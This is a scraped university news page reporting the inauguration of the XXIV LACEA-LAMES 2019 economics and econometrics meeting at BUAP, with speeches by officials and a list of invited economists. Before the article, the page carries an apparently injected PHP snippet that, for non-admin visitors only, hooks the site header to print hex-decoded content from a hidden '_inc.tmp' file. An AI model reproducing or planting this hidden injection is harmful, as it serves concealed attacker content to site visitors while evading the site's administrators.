if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Inauguran en la BUAP la XXIV Reunión LACEA-LAMES 2019 – La Opinión Universitaria La Opinión Universitaria
Menu

Inauguran en la BUAP la XXIV Reunión LACEA-LAMES 2019

 

+ Asisten 550 participantes con ponencias sobre economía y econometría; 14 oradores magistrales y prominentes especialistas

Como una oportunidad para alentar el debate sobre la actual agenda económica, a través de la experiencia y el intercambio de ideas entre estudiantes, investigadores, responsables del diseño de políticas públicas y miembros de organizaciones internacionales, fue inaugurada la XXIV Reunión LACEA-LAMES 2019 en el Centro de Convenciones del Complejo Cultural Universitario de la BUAP.

José Carlos Bernal Suárez, vicerrector de Extensión y Difusión de la Cultura, en representación del Rector Alfonso Esparza Ortiz, dio la bienvenida a los participantes en la BUAP, institución anfitriona de este foro considerado el más importante en materia económica y de econometría de América Latina y el Caribe.

“Este es uno de los foros científicos y altamente especializados más importantes de la región, en el que se presentan propuestas originales e innovadoras en el campo de la economía y econometría, pues reúne a 550 participantes con ponencias por escrito, 14 oradores magistrales, 18 conferencistas invitados y prominentes especialistas; todos ellos poseedores de una sólida formación académica”, expresó.

El vicerrector enfatizó que este encuentro -que tiene lugar en un punto de inflexión de la economía mundial- alienta el debate acerca de asuntos ineludibles, como el proceso de desglobalización que ocurre en el momento que el comercio internacional crece menos que el PIB mundial, y está dando paso a la creación de bloques regionales, así como a guerras comerciales que no son privativas entre las potencias.

“Toda vez que el complejo panorama es resultado de diversas variantes económicas, crecientes barreras comerciales, incertidumbre geopolítica y factores estructurales, es impostergable encontrar mecanismos efectivos para enfrentar y tratar de revertir los problemas que de él derivan, y el encuentro académico que hoy inicia brinda la oportunidad de generar una discusión proactiva que permita avanzar en ese propósito. Así, los economistas y los econometristas están Ilamados a elaborar alternativas viables, eficaces y pertinentes”, añadió.

Jesús Seade Kuri, subsecretario para Asuntos de América del Norte y representante del titular de la Secretaría de Hacienda y Crédito Público, Arturo Herrera Gutiérrez, recordó su paso por este foro cuando presidió el primer congreso en México, que ocurrió durante la formación de la Sociedad de Econometría de América Latina (LAMES) y antes del nacimiento de la Asociación de Economía de América Latina y del Caribe (LACEA).

 

Asistieron también a la inauguración Santiago Levy Algazi, presidente de la Asociación de Economía de América Latina y del Caribe (LACEA), y Orazio Attanasio, representante de Stephen Morris, presidente de la Sociedad de Econometría de América Latina (LAMES).

 

Durante la XXIV Reunión LACEA-LAMES 2019 estarán presentes Sanjiv M. Ravi Kanbur, profesor de Economía en la Universidad de Cornell, quien trabajó para el Banco Mundial y fue director del Informe sobre el Desarrollo Mundial; Oriana Bandiera, economista y académica italiana, especializada en Economía del Desarrollo en la London School of Economics; y Tim Besley, profesor de Economía y Ciencias Políticas en la Escuela de Economía y Ciencia Política de Londres.

No comments

Deja una respuesta

Tweets recientes